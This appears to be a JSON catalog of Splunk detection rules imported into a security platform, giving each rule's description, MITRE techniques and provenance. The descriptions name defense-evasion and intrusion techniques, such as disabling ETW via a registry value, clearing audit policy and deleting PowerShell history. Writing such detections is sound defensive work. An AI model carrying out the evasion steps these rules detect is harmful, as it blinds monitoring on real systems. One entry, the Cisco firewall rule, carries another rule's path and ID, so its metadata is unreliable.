If confirmed malicious, this behavior could lead to the execution of multi-stage payloads, potentially resulting in full system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mshta-writing-to-world-writable-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "efbcf8ee-bc75-47f1-8985-a5c638c4faf0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mshta_writing_to_world_writable_path.yml" } }, { "id": "splunk-security-content-efc25501-4e75-4075-8cc5-ac80f2847d80", "type": "detection", "name": "Windows Firewall Rule Added", "description": "This detection identifies instances where a Windows Firewall rule is added by monitoring Event ID 4946 in the Windows Security Event Log. Firewall rule modifications can indicate legitimate administrative actions, but they may also signal unauthorized changes, misconfigurations, or malicious activity such as attackers allowing traffic for backdoors or persistence mechanisms. By analyzing fields like RuleName, RuleId, Computer, and ProfileChanged, security teams can determine whether the change aligns with expected behavior. 
Correlating with user activity and process execution can help distinguish false positives from real threats, ensuring better visibility into potential security risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-firewall-rule-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "efc25501-4e75-4075-8cc5-ac80f2847d80", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_firewall_rule_added.yml" } }, { "id": "splunk-security-content-efebf0c4-dcf4-496f-85a2-5ab7ad8fa876", "type": "detection", "name": "Kubernetes Shell Running on Worker Node", "description": "The following analytic identifies shell activity within the Kubernetes privilege scope on a worker node. It leverages process metrics from an OTEL collector hostmetrics receiver, specifically process.cpu.utilization and process.memory.utilization, pulled from Splunk Observability Cloud. This activity is significant as unauthorized shell processes can indicate potential security threats, providing attackers an entry point to compromise the node and the entire Kubernetes cluster. 
If confirmed malicious, this activity could lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks, severely compromising the cluster's security and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-shell-running-on-worker-node.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "efebf0c4-dcf4-496f-85a2-5ab7ad8fa876", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_shell_running_on_worker_node.yml" } }, { "id": "splunk-security-content-eff7919a-8330-11eb-83f8-acde48001122", "type": "detection", "name": "Ransomware Notes bulk creation", "description": "The following analytic identifies the bulk creation of ransomware notes (e.g., .txt, .html, .hta files) on an infected machine. It leverages Sysmon EventCode 11 to detect multiple instances of these file types being created within a short time frame. This activity is significant as it often indicates an active ransomware attack, where the attacker is notifying the victim of the encryption. 
If confirmed malicious, this behavior could lead to widespread data encryption, rendering critical files inaccessible and potentially causing significant operational disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ransomware-notes-bulk-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eff7919a-8330-11eb-83f8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ransomware_notes_bulk_creation.yml" } }, { "id": "splunk-security-content-f02b64b8-cbea-4f75-bf77-7a05111566b1", "type": "detection", "name": "Windows Office Product Spawned Child Process For Download", "description": "The following analytic identifies Office applications spawning child processes to download content via HTTP/HTTPS. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where Office applications like Word or Excel initiate network connections, excluding common browsers. This activity is significant as it often indicates the use of malicious documents to execute living-off-the-land binaries (LOLBins) for payload delivery. 
If confirmed malicious, this behavior could lead to unauthorized code execution, data exfiltration, or further malware deployment, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-child-process-for-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f02b64b8-cbea-4f75-bf77-7a05111566b1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_child_process_for_download.yml" } }, { "id": "splunk-security-content-f0306acf-a6ab-437a-bbc6-8628f8d5c97e", "type": "detection", "name": "Windows Steal Authentication Certificates - ESC1 Authentication", "description": "The following analytic detects when a suspicious certificate with a Subject Alternative Name (SAN) is issued using Active Directory Certificate Services (AD CS) and then immediately used for authentication. This detection leverages Windows Security Event Logs, specifically EventCode 4887, to identify the issuance and subsequent use of the certificate. This activity is significant because improperly configured certificate templates can be exploited for privilege escalation and environment compromise. 
If confirmed malicious, an attacker could gain unauthorized access, escalate privileges, and potentially compromise the entire environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649", "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-esc1-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f0306acf-a6ab-437a-bbc6-8628f8d5c97e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates___esc1_authentication.yml" } }, { "id": "splunk-security-content-f03355e0-28b5-4e9b-815a-6adffc63b38c", "type": "detection", "name": "Windows Rundll32 WebDav With Network Connection", "description": "The following analytic detects the execution of rundll32.exe with command-line arguments loading davclnt.dll and the davsetcookie function to access a remote WebDav instance. It uses data from Endpoint Detection and Response (EDR) agents, correlating process execution and network traffic data. This activity is significant as it may indicate exploitation of CVE-2023-23397, a known vulnerability. 
If confirmed malicious, this could allow an attacker to establish unauthorized remote connections, potentially leading to data exfiltration or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-webdav-with-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f03355e0-28b5-4e9b-815a-6adffc63b38c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_webdav_with_network_connection.yml" } }, { "id": "splunk-security-content-f067f7cf-f41b-4a60-985e-c23e268a13cb", "type": "detection", "name": "Windows Audit Policy Cleared via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/clear\" command-line argument used to clears the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-cleared-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f067f7cf-f41b-4a60-985e-c23e268a13cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_cleared_via_auditpol.yml" } }, { "id": "splunk-security-content-f0c9d62f-a232-4edd-b17e-bc409fb133d4", "type": "detection", "name": "Domain Group Discovery With Dsquery", "description": "The following analytic identifies the execution of `dsquery.exe` with command-line arguments used to query for domain groups. It leverages Endpoint Detection and Response (EDR) data, focusing on process names and command-line arguments. This activity is significant because both Red Teams and adversaries use `dsquery.exe` to enumerate domain groups, gaining situational awareness and facilitating further Active Directory discovery. 
If confirmed malicious, this behavior could allow attackers to map out the domain structure, identify high-value targets, and plan subsequent attacks, potentially leading to privilege escalation or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-group-discovery-with-dsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f0c9d62f-a232-4edd-b17e-bc409fb133d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_group_discovery_with_dsquery.yml" } }, { "id": "splunk-security-content-f0db4464-55d9-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious microsoft workflow compiler rename", "description": "The following analytic detects the renaming of microsoft.workflow.compiler.exe, a rarely used executable typically located in C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319. This detection leverages Endpoint Detection and Response (EDR) data, focusing on process names and original file names. This activity is significant because renaming this executable can indicate an attempt to evade security controls. 
If confirmed malicious, an attacker could use this renamed executable to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-microsoft-workflow-compiler-rename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f0db4464-55d9-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml" } }, { "id": "splunk-security-content-f0eacfa4-d33f-11eb-8f9d-acde48001122", "type": "detection", "name": "Disable ETW Through Registry", "description": "The following analytic detects modifications to the registry that disable the Event Tracing for Windows (ETW) feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled\" with a value set to \"0x00000000\". This activity is significant because disabling ETW can allow attackers to evade detection mechanisms, making it harder for security tools to monitor malicious activities. 
If confirmed malicious, this could enable attackers to execute payloads with minimal alerts, impairing defenses and potentially leading to further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-etw-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f0eacfa4-d33f-11eb-8f9d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_etw_through_registry.yml" } }, { "id": "splunk-security-content-f122cb2e-d773-4f11-8399-62a3572d8dd7", "type": "detection", "name": "Windows Unusual Count Of Invalid Users Fail To Auth Using Kerberos", "description": "The following analytic identifies a source endpoint failing to authenticate with multiple invalid domain users using the Kerberos protocol. It leverages Event ID 4768, which is generated when the Key Distribution Center issues a Kerberos Ticket Granting Ticket (TGT) and detects failure code 0x6, indicating the user is not found in the Kerberos database. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. 
If confirmed malicious, this activity could lead to unauthorized access and potential privilege escalation within the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-invalid-users-fail-to-auth-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f122cb2e-d773-4f11-8399-62a3572d8dd7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_invalid_users_fail_to_auth_using_kerberos.yml" } }, { "id": "splunk-security-content-f12b81e6-2fa2-48e0-95cd-f5f7e4d9ac89", "type": "detection", "name": "Windows Bluetooth Service Installed From Uncommon Location", "description": "Identifies the creation of a Windows service named \"BluetoothService\" with a binary path in user-writable directories, particularly %AppData%\\Bluetooth.\nThis technique was observed in the Lotus Blossom Chrysalis backdoor campaign, where attackers created a service named \"BluetoothService\" pointing to a malicious binary (renamed Bitdefender Submission Wizard) in a hidden AppData directory.\nWhile legitimate Bluetooth services exist in Windows, they are system services with binaries in System32.\nAny BluetoothService created with a binary path in user directories (AppData, Temp, Downloads) is highly suspicious and indicates potential malware persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bluetooth-service-installed-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f12b81e6-2fa2-48e0-95cd-f5f7e4d9ac89", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bluetooth_service_installed_from_uncommon_location.yml" } }, { "id": "splunk-security-content-f1369394-48e1-4327-bf6d-14377f4b8687", "type": "detection", "name": "Windows Powershell History File Deletion", "description": "The following analytic detects the usage of PowerShell to delete its command history file, which may indicate an attempt to evade detection by removing evidence of executed commands. PowerShell stores command history in ConsoleHost_history.txt under the user\u2019s profile directory. Adversaries or malicious scripts may delete this file using Remove-Item, del, or similar commands. This detection focuses on file deletion events targeting the history file, correlating them with recent PowerShell activity. 
While legitimate users may occasionally clear history, frequent or automated deletions should be investigated for potential defense evasion or post-exploitation cleanup activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-history-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f1369394-48e1-4327-bf6d-14377f4b8687", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_history_file_deletion.yml" } }, { "id": "splunk-security-content-f1483f5e-ee29-11eb-9d23-acde48001122", "type": "detection", "name": "Rundll32 DNSQuery", "description": "The following analytic detects a suspicious `rundll32.exe` process making HTTP connections and performing DNS queries to web domains. It leverages Sysmon EventCode 22 logs to identify these activities. This behavior is significant as it is commonly associated with IcedID malware, where `rundll32.exe` checks internet connectivity and communicates with C&C servers to download configurations and other components. 
If confirmed malicious, this activity could allow attackers to establish persistence, download additional payloads, and exfiltrate sensitive data, posing a severe threat to the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-dnsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f1483f5e-ee29-11eb-9d23-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/rundll32_dnsquery.yml" } }, { "id": "splunk-security-content-f164bc6f-ecbe-45e0-aaa6-f5c4d8c84b9a", "type": "detection", "name": "Windows TOR Client Execution", "description": "The following analytic detects the execution of the TOR Browser and related TOR components on Windows endpoints by monitoring process creation activity.\nAdversaries and insider threats leverage TOR to anonymize command-and-control traffic, facilitate data exfiltration, and evade network monitoring and policy enforcement.\nWhile TOR can be used for legitimate research and privacy purposes, its presence on enterprise endpoints is often unusual and should be investigated to determine intent, scope, and any associated malicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/windows-tor-client-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f164bc6f-ecbe-45e0-aaa6-f5c4d8c84b9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_tor_client_execution.yml" } }, { "id": "splunk-security-content-f19e09b0-9308-11eb-b7ec-acde48001122", "type": "detection", "name": "AWS IAM Assume Role Policy Brute Force", "description": "The following analytic detects multiple failed attempts to assume an AWS IAM role, indicating a potential brute force attack. It leverages AWS CloudTrail logs to identify `MalformedPolicyDocumentException` errors with a status of `failure` and filters out legitimate AWS services. This activity is significant as repeated failures to assume roles can indicate an adversary attempting to guess role names, which is a precursor to unauthorized access. 
If confirmed malicious, this could lead to unauthorized access to AWS resources, potentially compromising sensitive data and services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-assume-role-policy-brute-force.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f19e09b0-9308-11eb-b7ec-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_assume_role_policy_brute_force.yml" } }, { "id": "splunk-security-content-f1c07594-a141-11eb-8407-acde48001122", "type": "detection", "name": "DLLHost with no Command Line Arguments with Network", "description": "The following analytic detects instances of DLLHost.exe running without\ncommand line arguments while establishing a network connection.\nThis behavior is identified using Endpoint Detection and Response (EDR) telemetry,\nfocusing on process execution and network activity data.\nIt is significant because DLLHost.exe typically runs with specific arguments,\nand its absence can indicate malicious activity, such as Cobalt Strike usage.\nIf confirmed malicious, this activity could allow attackers to execute code,\nmove laterally, or exfiltrate data, posing a severe threat to the network's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": 
"splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dllhost-with-no-command-line-arguments-with-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f1c07594-a141-11eb-8407-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml" } }, { "id": "splunk-security-content-f2132d74-cf81-4c5e-8799-ab069e67dc9f", "type": "detection", "name": "AWS AMI Attribute Modification for Exfiltration", "description": "The following analytic detects suspicious modifications to AWS AMI attributes, such as sharing an AMI with another AWS account or making it publicly accessible. It leverages AWS CloudTrail logs to identify these changes by monitoring specific API calls. This activity is significant because adversaries can exploit these modifications to exfiltrate sensitive data stored in AWS resources. 
If confirmed malicious, this could lead to unauthorized access and potential data breaches, compromising the confidentiality and integrity of organizational information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ami-attribute-modification-for-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2132d74-cf81-4c5e-8799-ab069e67dc9f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ami_attribute_modification_for_exfiltration.yml" } }, { "id": "splunk-security-content-f26445a8-a6a2-4855-bec0-0c39e52e5b8f", "type": "detection", "name": "Cisco Secure Firewall - File Download Over Uncommon Port", "description": "The following analytic detects file transfers flagged as malware that occurred over non-standard ports (other than 80 and 443). Adversaries may attempt to bypass protocol-based detection or use alternate ports to blend in with other traffic. This analytic identifies these non-conventional flows and surfaces potential evasion techniques. 
If confirmed malicious, this indicates potential malware delivery or other nefarious activity.
Immediate investigation and containment are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-rundll32-with-no-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f28e787e-69ca-480e-9f98-ab970e6d4bcc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_rundll32_with_no_dll.yml" } }, { "id": "splunk-security-content-f2a1615a-1d63-11ec-97d2-acde48001122", "type": "detection", "name": "Remcos client registry install entry", "description": "The following analytic detects the presence of a registry key associated with the Remcos RAT agent on a host. It leverages data from the Endpoint.Processes and Endpoint.Registry data models in Splunk, focusing on instances where the \"license\" key is found in the \"Software\\Remcos\" path. This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration. If confirmed malicious, the attacker could gain control over the system, steal sensitive information, or use the compromised host for further attacks. 
Immediate investigation and remediation are required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remcos-client-registry-install-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2a1615a-1d63-11ec-97d2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remcos_client_registry_install_entry.yml" } }, { "id": "splunk-security-content-f2a9df84-9b01-4a21-9e3a-7aa1a217f69e", "type": "detection", "name": "Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI", "description": "This analytic detects suspicious use of 'mshta.exe' or 'rundll32.exe' invoking 'mshtml.dll'\nor the 'RunHTMLApplication' export without including a direct HTTP/HTTPS URL in the command line.\nThis pattern could be associated with obfuscated script execution used by threat actors during\ninitial access or payload staging. 
The absence of a visible URL may indicate attempts to evade static\ndetections by embedding the URL via string concatenation, encoding (e.g., hex), or indirect script loaders\nlike 'GetObject()'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-mshtml-or-mshta-network-execution-without-url-in-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2a9df84-9b01-4a21-9e3a-7aa1a217f69e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___mshtml_or_mshta_network_execution_without_url_in_cli.yml" } }, { "id": "splunk-security-content-f2cc1584-46ee-485b-b905-977c067f36de", "type": "detection", "name": "Windows Vulnerable 3CX Software", "description": "The following analytic detects instances of the 3CXDesktopApp.exe with a FileVersion of 18.12.x, leveraging Sysmon logs. This detection focuses on identifying vulnerable versions 18.12.407 and 18.12.416 of the 3CX desktop app. Monitoring this activity is crucial as these specific versions have known vulnerabilities that could be exploited by attackers. 
If confirmed malicious, exploitation of this vulnerability could lead to unauthorized access, code execution, or further compromise of the affected system, posing significant security risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1195.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-vulnerable-3cx-software.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2cc1584-46ee-485b-b905-977c067f36de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_vulnerable_3cx_software.yml" } }, { "id": "splunk-security-content-f2d1110d-b01c-4a58-9975-90a9edeb083a", "type": "detection", "name": "Linux Auditd File Permissions Modification Via Chattr", "description": "The following analytic detects suspicious file permissions modifications using the chattr command, which may indicate an attacker attempting to manipulate file attributes to evade detection or prevent alteration. The chattr command can be used to make files immutable or restrict deletion, which can be leveraged to protect malicious files or disrupt system operations. 
